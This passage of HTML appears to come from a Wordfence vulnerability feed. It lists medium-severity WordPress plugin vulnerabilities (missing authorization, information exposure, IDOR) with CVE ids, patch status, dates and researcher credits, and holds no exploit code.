<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d547ba1-bfe5-4dce-a02e-90d865ebea86" target="_blank" rel="noopener">Online Contact Widget-多合一在线客服插件 &lt;= 1.3.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32472" target="_blank" rel="noopener noreferrer">							CVE-2026-32472						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/online-contact-widget" target="_blank" rel="noopener">Online Contact Widget-多合一在线客服插件</a> <span class="wfvr-software-slug">[online-contact-widget]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d547ba1-bfe5-4dce-a02e-90d865ebea86" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51df33a7-d04d-4c47-aba8-d174e2a40170" target="_blank" rel="noopener">Outranking Plugin Options &lt;= 1.1.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73385" target="_blank" rel="noopener noreferrer">							CVE-2026-73385						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/outranking" target="_blank" rel="noopener">Outranking Plugin Options</a> <span class="wfvr-software-slug">[outranking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51df33a7-d04d-4c47-aba8-d174e2a40170" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ffc741e-9506-40a2-b3d3-48ed5d06bc62" target="_blank" rel="noopener">Pay with Contact Form 7 &lt;= 1.0.4 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73384" target="_blank" rel="noopener noreferrer">							CVE-2026-73384						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pay-with-contact-form-7" target="_blank" rel="noopener">Pay with Contact Form 7</a> <span class="wfvr-software-slug">[pay-with-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ffc741e-9506-40a2-b3d3-48ed5d06bc62" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3e5b00da-4182-4777-aa8e-bc9cd3f3883f" target="_blank" rel="noopener">Piraeus Bank WooCommerce Payment Gateway  3.2.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73398" target="_blank" rel="noopener noreferrer">							CVE-2026-73398						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-payment-gateway-for-piraeus-bank" target="_blank" rel="noopener">Piraeus Bank WooCommerce Payment Gateway</a> <span class="wfvr-software-slug">[woo-payment-gateway-for-piraeus-bank]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3e5b00da-4182-4777-aa8e-bc9cd3f3883f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/752ec260-d405-41af-8700-7780df1aa59b" target="_blank" rel="noopener">Smart Popup by Supsystic &lt;= 1.13.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73381" target="_blank" rel="noopener noreferrer">							CVE-2026-73381						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-by-supsystic" target="_blank" rel="noopener">Smart Popup by Supsystic</a> <span class="wfvr-software-slug">[popup-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/752ec260-d405-41af-8700-7780df1aa59b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbac8033-9248-4921-86c8-5ad582299bc5" target="_blank" rel="noopener">Stitch Express &lt;= 1.9.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73394" target="_blank" rel="noopener noreferrer">							CVE-2026-73394						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stitch-express" target="_blank" rel="noopener">Stitch Express</a> <span class="wfvr-software-slug">[stitch-express]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener">babyhack</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbac8033-9248-4921-86c8-5ad582299bc5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/268148ec-ab8a-4912-8250-1d40062b01a8" target="_blank" rel="noopener">SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent &lt;= 3.5.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73350" target="_blank" rel="noopener noreferrer">							CVE-2026-73350						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/supportcandy" target="_blank" rel="noopener">SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent</a> <span class="wfvr-software-slug">[supportcandy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-moon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da7c49ec64423fe639d209c7e2603c4b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da7c49ec64423fe639d209c7e2603c4b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-moon" target="_blank" rel="noopener">hackthesoul</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/268148ec-ab8a-4912-8250-1d40062b01a8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1892207-0e51-4b2e-bc71-d6a0111b7041" target="_blank" rel="noopener">Themify Builder &lt;= 7.8.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Builder Data Modification via &#8216;tb_update_old_data&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75027" target="_blank" rel="noopener noreferrer">							CVE-2026-75027						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themify-builder" target="_blank" rel="noopener">Themify Builder</a> <span class="wfvr-software-slug">[themify-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1892207-0e51-4b2e-bc71-d6a0111b7041" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a5a8507-4c45-429b-b013-fe9a14a94ffc" target="_blank" rel="noopener">Track Geolocation Of Users Using Contact Form 7 &lt;= 3.0.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73386" target="_blank" rel="noopener noreferrer">							CVE-2026-73386						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/track-geolocation-of-users-using-contact-form-7" target="_blank" rel="noopener">Track Geolocation Of Users Using Contact Form 7</a> <span class="wfvr-software-slug">[track-geolocation-of-users-using-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a5a8507-4c45-429b-b013-fe9a14a94ffc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbf0302a-5997-4517-80fc-a75c256377ff" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System &lt; 1.2.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18779" target="_blank" rel="noopener noreferrer">							CVE-2026-18779						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbf0302a-5997-4517-80fc-a75c256377ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01d040c8-5fd9-4dc7-af30-10c58571b16f" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System &lt; 1.2.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18777" target="_blank" rel="noopener noreferrer">							CVE-2026-18777						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/79c0b14658426052f872fd8e16ab8459.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79c0b14658426052f872fd8e16ab8459"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener">Mokksh Parekh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01d040c8-5fd9-4dc7-af30-10c58571b16f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f70e1d20-2f8c-40ce-9c2f-74a07cd18f52" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System &lt; 1.2.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18778" target="_blank" rel="noopener noreferrer">							CVE-2026-18778						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luka-zimonjic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/89e4fa41063e89cf35fe78b8c3f1a5f7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="89e4fa41063e89cf35fe78b8c3f1a5f7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luka-zimonjic" target="_blank" rel="noopener">Luka Zimonjic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f70e1d20-2f8c-40ce-9c2f-74a07cd18f52" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ffe32701-4cfe-42f1-bf00-8de653d6568a" target="_blank" rel="noopener">Ultimate Maps by Supsystic &lt; 1.5.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73377" target="_blank" rel="noopener noreferrer">							CVE-2026-73377						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-maps-by-supsystic" target="_blank" rel="noopener">Ultimate Maps by Supsystic</a> <span class="wfvr-software-slug">[ultimate-maps-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ffe32701-4cfe-42f1-bf00-8de653d6568a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/56b6b56d-7ff4-40b5-a34b-703088387ab1" target="_blank" rel="noopener">User Verification &lt;= 2.0.47 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14861" target="_blank" rel="noopener noreferrer">							CVE-2026-14861						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-verification" target="_blank" rel="noopener">User Verification by PickPlugins</a> <span class="wfvr-software-slug">[user-verification]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/56b6b56d-7ff4-40b5-a34b-703088387ab1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
